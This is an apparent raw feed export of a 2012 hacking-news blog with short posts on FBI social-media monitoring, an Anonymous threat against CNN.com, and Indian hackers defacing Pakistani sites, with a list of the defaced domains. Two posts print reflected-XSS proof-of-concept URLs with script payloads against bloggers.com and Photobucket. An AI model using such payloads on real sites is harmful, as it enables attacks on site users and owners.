url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge2RDsFlHGTc6xRXf6F0MJ_f6fIG22TWCHE7kJMB93vpPcaOBUJNvIrdbfklF5jFOhQerbf1D72cVjt4Qn55AZBB9vy0ATYv-0ETx508Nre5UGiFx4enqiO7Phl5YYMhdRi6k1VnQ3QJkN/s72-c/universal.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-277568035629279050</id><published>2012-01-28T21:44:00.000-08:00</published><updated>2012-01-28T21:44:34.708-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>FBI will Monitor Social Media using Crawl Application</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPufp9WVDFQ7EVqIwDmB1Tnng7ZuxSfHibYhtSO2cx_q7MLEGDaNb2xISCkTBWrZfHssxSluc_ZLKb7T5lrFOvqnCZUsHmeOIP3jFLgx7-Ys7Ev82z1rfCdHOzEptR-otBlnDDEEVlqbw/s1600/FBI+will+Monitor+Social+Media+using+Crawl+Application.jpg&quot; rel=&quot;follow&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;FBI+will+Monitor+Social+Media+using+Crawl+Application&quot; border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPufp9WVDFQ7EVqIwDmB1Tnng7ZuxSfHibYhtSO2cx_q7MLEGDaNb2xISCkTBWrZfHssxSluc_ZLKb7T5lrFOvqnCZUsHmeOIP3jFLgx7-Ys7Ev82z1rfCdHOzEptR-otBlnDDEEVlqbw/s640/FBI+will+Monitor+Social+Media+using+Crawl+Application.jpg&quot; title=&quot;FBI+will+Monitor+Social+Media+using+Crawl+Application&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The Federal  Bureau of Investigation is looking for a better way to spy on Facebook  and Twitter users. The Bureau is asking companies to build software that  can effectively scan social media online for significant words, phrases  and behavior so that agents can respond.A &lt;a href=&quot;https://www.fbo.gov/index?s=opportunity&amp;amp;mode=form&amp;amp;tab=core&amp;amp;id=c65777356334dab8685984fa74bfd636&amp;amp;_cview=1&quot; rel=&quot;follow&quot;&gt;paper&lt;/a&gt; posted on the FBI website asks for companies to build programs that will map sentiment and wrongdoing.&lt;/div&gt;&lt;div id=&quot;aim24165979814598639207&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;“&lt;i&gt;&lt;span style=&quot;color: #990000;&quot;&gt;The  application must be infinitely flexible and have the ability to adapt  quickly to changing threats to maintain the strategic and tactical  advantage&lt;/span&gt;&lt;/i&gt;,” the Request for Information said, “&lt;i&gt;&lt;span style=&quot;color: #990000;&quot;&gt;The  purpose of this effort is to meet the outlined objectives…for the  enhancement [of] FBI SOIC’s overall situation awareness and improved  strategic decision making.&lt;/span&gt;&lt;/i&gt;”The tool would be used in  “reconnaisance and surveillance missions, National Special Security  Events (NSS) planning, NSSE operations, SOIC operations, counter  intelligence, terrorism, and more.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Although the police, including  in Britain, already use Facebook routinely to ascertain the whereabouts  of criminals, automatically filtering out irrelevant information remains  challenging. The new FBI application will be able to automatically  highlight the most relevant information. The FBI is seeking responses by  10 February.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/277568035629279050/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/fbi-will-monitor-social-media-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/277568035629279050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/277568035629279050'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/fbi-will-monitor-social-media-using.html' title='FBI will Monitor Social Media using Crawl Application'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIPufp9WVDFQ7EVqIwDmB1Tnng7ZuxSfHibYhtSO2cx_q7MLEGDaNb2xISCkTBWrZfHssxSluc_ZLKb7T5lrFOvqnCZUsHmeOIP3jFLgx7-Ys7Ev82z1rfCdHOzEptR-otBlnDDEEVlqbw/s72-c/FBI+will+Monitor+Social+Media+using+Crawl+Application.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-8527602010349178549</id><published>2012-01-28T21:41:00.000-08:00</published><updated>2012-01-28T21:43:18.739-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability"/><title type='text'>XSS Vulnerability in Bloggers.com</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgygoUOUQ1XA8o82nChpmej8uhNy6c41zvIduYMqQemWBB7AllxBe0DnifljDt9qEDlFyg5sqjOA6n4nC90r7Ev4nAUQwGo_u9uoN5oNgylBUikkMXbX3ILFiND0x4t1YoJd8YqDqW_lm8m/s1600/Bloggers.com.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgygoUOUQ1XA8o82nChpmej8uhNy6c41zvIduYMqQemWBB7AllxBe0DnifljDt9qEDlFyg5sqjOA6n4nC90r7Ev4nAUQwGo_u9uoN5oNgylBUikkMXbX3ILFiND0x4t1YoJd8YqDqW_lm8m/s1600/Bloggers.com.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hacker Group &lt;u&gt;&lt;b&gt;&quot;GodOfHackers&quot;&lt;/b&gt;&lt;/u&gt; discovered XSS[Cross site scripting] security flaw in one of high profile site &lt;a href=&quot;http://bloggers.com/&quot;&gt;bloggers.com&lt;/a&gt;. Bloggers.com is one of best bloggers community , it will help to know the best bloggers around the world, discover them and connect yourself with this friendly bloggers community. It has &lt;u&gt;&lt;b&gt;Alexa Rank 3,519.&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Vulnerability Details:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt; Type: Non-Persistent XSS&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Alert-Level: Medium&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Author: GodOfHackers&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Vulnerable Link: http://bloggers.com/topics/&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;u&gt;&lt;b&gt;&lt;br /&gt;
Proof of Concept :-&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;a href=&quot;http://bloggers.com/topics/%3Cscript%3Ealert%28%22XSS+By+GOH%22%29%3C%2Fscript%3E&quot;&gt;http://bloggers.com/topics/%3Cscript%3Ealert%28%22XSS+By+GOH%22%29%3C%2Fscript%3E&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/8527602010349178549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/xss-vulnerability-in-bloggerscom.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8527602010349178549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8527602010349178549'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/xss-vulnerability-in-bloggerscom.html' title='XSS Vulnerability in Bloggers.com'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgygoUOUQ1XA8o82nChpmej8uhNy6c41zvIduYMqQemWBB7AllxBe0DnifljDt9qEDlFyg5sqjOA6n4nC90r7Ev4nAUQwGo_u9uoN5oNgylBUikkMXbX3ILFiND0x4t1YoJd8YqDqW_lm8m/s72-c/Bloggers.com.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-5362069483740017270</id><published>2012-01-28T03:49:00.000-08:00</published><updated>2012-01-28T03:50:37.320-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>Anonymous threatened to Shutdown CNN.com - #OpDebateBlackout</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8SRv_54j2kWTT5y3IDtljVSVS5XR18-MJVfoDXeEOsvRBPttnsOovBOD3HXGlPvF7Wx2_Jnii8AqYA4pFu4OlOgFXNa2jdnxYOFiv8lK5lyJRyUM77lrSWrMjjSuDUaIqqYcCdCe_5TPu/s1600/anon.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8SRv_54j2kWTT5y3IDtljVSVS5XR18-MJVfoDXeEOsvRBPttnsOovBOD3HXGlPvF7Wx2_Jnii8AqYA4pFu4OlOgFXNa2jdnxYOFiv8lK5lyJRyUM77lrSWrMjjSuDUaIqqYcCdCe_5TPu/s1600/anon.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The protest against Internet censorship by Anonymous continues. Now they have called another operation named #OpDebateBlackout. According to a YouTube video Anon vows to shutdown famous media CNN during yesterday night debate.&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Anon said:-&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&quot;Shut down CNN.com during the Florida debate. In response to the establishment media blackout of Ron Paul, and specifically to the lack of equal time given to him in the debates, we the people will be blacking out the responses of all candidates except Ron Paul in the upcoming CNN debate in Jacksonville Florida on Thursday, January 26 at 8PM eastern standard time. This is a call to all who are willing and able to join this effort to show the establishment media that we will not tolerate the continued media blackout of Ron Paul, and that we will, in return, shut down the cnn website and their live stream of the debate.&quot;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;b&gt;Video Released by Anonymous :- &lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;object height=&quot;360&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/uaYlegYZcj8&amp;hl=en_US&amp;feature=player_embedded&amp;version=3&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/uaYlegYZcj8&amp;hl=en_US&amp;feature=player_embedded&amp;version=3&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowScriptAccess=&quot;always&quot; width=&quot;640&quot; height=&quot;360&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Earlier for #SOPAblackout issue anon has performed massive cyber attack. And also for #OpMegaupload they have bring down Federal Authorities, US Govt, Brazil Govt, Ireland&#39;s Dept of Finance &amp;amp; Justice, CBS TV Network, UFC.com and many more. We would also like to give you reminder that this is not the first time earlier Anon also threatened another media (FOX News) in the #OpFoxHunt.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/5362069483740017270/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/anonymous-threatened-to-shutdown-cnncom.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5362069483740017270'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5362069483740017270'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/anonymous-threatened-to-shutdown-cnncom.html' title='Anonymous threatened to Shutdown CNN.com - #OpDebateBlackout'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8SRv_54j2kWTT5y3IDtljVSVS5XR18-MJVfoDXeEOsvRBPttnsOovBOD3HXGlPvF7Wx2_Jnii8AqYA4pFu4OlOgFXNa2jdnxYOFiv8lK5lyJRyUM77lrSWrMjjSuDUaIqqYcCdCe_5TPu/s72-c/anon.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-3008893636473468880</id><published>2012-01-28T03:41:00.000-08:00</published><updated>2012-01-28T03:41:05.086-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><category scheme="http://www.blogger.com/atom/ns#" term="Vulnerability"/><title type='text'>XSS Vulnerability found in Photobucket</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk378xGtX_zTnpuDH4ntO-2AMqZW-uMa2D5o6cokmhMGwgMazr7dANOoU62nFhFAvxzoSEGq7SUEnT0oWOcA5HH64TPN3wqvMBsRcQ-DkUqKOj2keQBL1tNcEWdFQkNhKRuEki89AfA0jQ/s1600/pb.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;60&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk378xGtX_zTnpuDH4ntO-2AMqZW-uMa2D5o6cokmhMGwgMazr7dANOoU62nFhFAvxzoSEGq7SUEnT0oWOcA5HH64TPN3wqvMBsRcQ-DkUqKOj2keQBL1tNcEWdFQkNhKRuEki89AfA0jQ/s320/pb.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
XSS [cross site scripting] vulnerability found in photobucket.com by God Of Hackers the Hacker group n0caReTeAm also found a xss vulnerability in photobucket.com . It seems to be two vulnerabilities are same&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Here is the vulnerable link found by GodofHackers:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;a href=&quot;http://media.photobucket.com/image/hacker/ahsanulkarim/Tech%20Zons/wordpress-hacked-290x160.jpg?o=%22%3E%3Cscript%3Ealert%28%22XSS%20By%20GOH%22%29%3C/script%3E&quot;&gt;http://media.photobucket.com/image/hacker/ahsanulkarim/Tech%20Zons/wordpress-hacked-290x160.jpg?o=%22%3E%3Cscript%3Ealert%28%22XSS%20By%20GOH%22%29%3C/script%3E&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/3008893636473468880/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/xss-vulnerability-found-in-photobucket.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3008893636473468880'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/3008893636473468880'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/xss-vulnerability-found-in-photobucket.html' title='XSS Vulnerability found in Photobucket'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk378xGtX_zTnpuDH4ntO-2AMqZW-uMa2D5o6cokmhMGwgMazr7dANOoU62nFhFAvxzoSEGq7SUEnT0oWOcA5HH64TPN3wqvMBsRcQ-DkUqKOj2keQBL1tNcEWdFQkNhKRuEki89AfA0jQ/s72-c/pb.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-9105575693278284677</id><published>2012-01-26T00:39:00.000-08:00</published><updated>2012-01-26T00:39:42.286-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><title type='text'>20 Pakistani Websites Hacked by Jaguar</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBvjyU-XpfbK7lIQmIfL_pKa1TZxG3-JWCduOmKnugTPSux06YYuU-3IqqadifkiBrlvH152W9LP2triBstCeszmQtzjn1ydAHJ2MzGHtXY7ufl34p9VdxSj3vbirx9vpC19y_T-Vf44cY/s1600/jaguar.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;An Indian &amp;nbsp;hacker Jaguar Hacked 20 pakistani websites For celebreating Indian Republic Day,&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;an another Indian hackers Team &quot;Team Nuts&quot; hacked 24 pakistani websites on republic day, check it &lt;a href=&quot;http://code104.blogspot.com/2012/01/24-pakistani-websites-hacked-by-team.html&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBvjyU-XpfbK7lIQmIfL_pKa1TZxG3-JWCduOmKnugTPSux06YYuU-3IqqadifkiBrlvH152W9LP2triBstCeszmQtzjn1ydAHJ2MzGHtXY7ufl34p9VdxSj3vbirx9vpC19y_T-Vf44cY/s1600/jaguar.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;310&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBvjyU-XpfbK7lIQmIfL_pKa1TZxG3-JWCduOmKnugTPSux06YYuU-3IqqadifkiBrlvH152W9LP2triBstCeszmQtzjn1ydAHJ2MzGHtXY7ufl34p9VdxSj3vbirx9vpC19y_T-Vf44cY/s320/jaguar.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;u&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;&lt;u&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Hacked websites : &lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;u&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://pakistannuclearweapons.com/&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.masterpaints.com.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://genie.com.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.ilhtpakistan.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.hairtransplantpakistanblog.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://business.org.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://equranpk.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.swopk.org/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.paklinenco.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.royalz.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://healthnetpk.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://swats.org.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://cleanmax.com.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.pakcafe.net/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.pakelevator.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br 